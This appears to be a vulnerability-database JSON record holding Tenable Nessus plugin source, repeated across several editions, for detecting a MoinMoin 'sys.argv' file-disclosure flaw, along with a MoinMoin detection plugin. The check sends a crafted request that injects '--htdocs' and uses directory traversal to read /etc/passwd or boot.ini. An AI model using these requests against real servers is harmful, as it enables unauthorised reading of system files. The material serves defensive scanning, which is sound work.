script_bugtraq_id(37853);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "viewCount": 0}, "differentElements": ["modified"], "edition": 6, "lastseen": "2019-10-28T20:41:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:moinmo:moinmoin"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of MoinMoin running on the remote host has an information disclosure vulnerability. Using a specially crafted request, an unauthenticated, remote attacker can specify the directory that the application uses for its static pages and read arbitrary files from that directory, subject to the privileges under which the application runs.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI' setting to be enabled.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "4573c5d521b0bf955401ef45fde1d9bdf9689ac222db5bab221885f09b5f9d79", "hashmap": [{"hash": "fe9a8063247dc1202e5c7b299bafaae5", "key": "href"}, {"hash": "1322ffe6a3b5b7adcb0ce273f3e1c8bc", "key": "sourceData"}, {"hash": "c92c413cead7d8b67a89850ba352e1d1", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e6bbd208158726fd2466851d40749c01", "key": "published"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "3bc8ae7fd7de8e514651987da94469a3", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3d3ded498434ba95a95554d0c03d27f9", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "fbaa7aaef004543abfb03afc18f36e29", "key": "description"}, {"hash": "2e3f98c5297011c43dcdc2909cdb11f9", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44383", "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "lastseen": "2018-06-14T11:46:45", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44383", "published": "2010-02-02T00:00:00", "references": ["http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2", "http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18", "http://moinmo.in/SecurityFixes"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_bugtraq_id(37853);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 3, "lastseen": "2018-06-14T11:46:45"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "2e3f98c5297011c43dcdc2909cdb11f9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "6d8679ef1db4573a6f317ba0acf5e0b7"}, {"key": "href", "hash": "bdb756c45ebf4e8973011f75b09eb8e4"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "c92c413cead7d8b67a89850ba352e1d1"}, {"key": "published", "hash": "e6bbd208158726fd2466851d40749c01"}, {"key": "references", "hash": "3d3ded498434ba95a95554d0c03d27f9"}, {"key": "reporter", "hash": "03db36597b98092613edba567eb84b31"}, {"key": "sourceData", "hash": "1322ffe6a3b5b7adcb0ce273f3e1c8bc"}, {"key": "title", "hash": "3bc8ae7fd7de8e514651987da94469a3"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "405fea9f54212659ef0c5d184d8eca6953498a01bb005f0316e68226a9c35574", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["MOINMOIN_DETECT.NASL"]}], "modified": "2019-11-01T02:55:26"}, "score": {"value": 0.3, "vector": "NONE", "modified": "2019-11-01T02:55:26"}, "vulnersScore": 0.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_bugtraq_id(37853);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "naslFamily": "CGI abuses", "pluginID": "44383", "cpe": ["cpe:/a:moinmo:moinmoin"], "scheme": null}
{"nessus": [{"lastseen": "2019-11-23T11:32:53", "bulletinFamily": "scanner", "description": "The remote host is running MoinMoin, a wiki written in Python.", "modified": "2019-11-02T00:00:00", "id": "MOINMOIN_DETECT.NASL", "href": "https://www.tenable.com/plugins/nessus/44382", "published": "2010-02-02T00:00:00", "type": "nessus", "title": "MoinMoin Detection", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44382);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_name(english:\"MoinMoin Detection\");\n script_summary(english:\"Looks for evidence of MoinMoin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web server is hosting a wiki written in Python.\");\n script_set_attribute(attribute:\"description\", value:\"The remote host is running MoinMoin, a wiki written in Python.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.moinmo.in/\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\",value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_set_attribute(attribute:\"asset_inventory\", value:\"True\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ndirs = cgi_dirs();\nif (thorough_tests)\n{\n dirs = make_list(dirs, '/wiki', '/moin.cgi', '/moinmoin');\n dirs = list_uniq(dirs);\n}\n\nchecks = make_array();\n\nregexes = make_list();\nregexes[0] = make_list(\"MoinMoin(<\\/a>)? Version<\");\nregexes[1] = make_list(\"<dd>Release (.+) \\[Revision\");\nchecks[\"/SystemInfo\"] = regexes;\n\ninstalls = find_install(\n appname : \"moinmoin\",\n checks : checks,\n dirs : dirs,\n port : port\n);\nif (isnull(installs)) audit(AUDIT_WEB_APP_NOT_INST, \"MoinMoin\", port);\n\nreport = NULL;\nif (report_verbosity > 0)\n{\n report = get_install_report(\n display_name : \"MoinMoin\",\n installs : installs,\n port : port\n );\n security_note(port:port, extra:report);\n}\nelse security_note(port);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}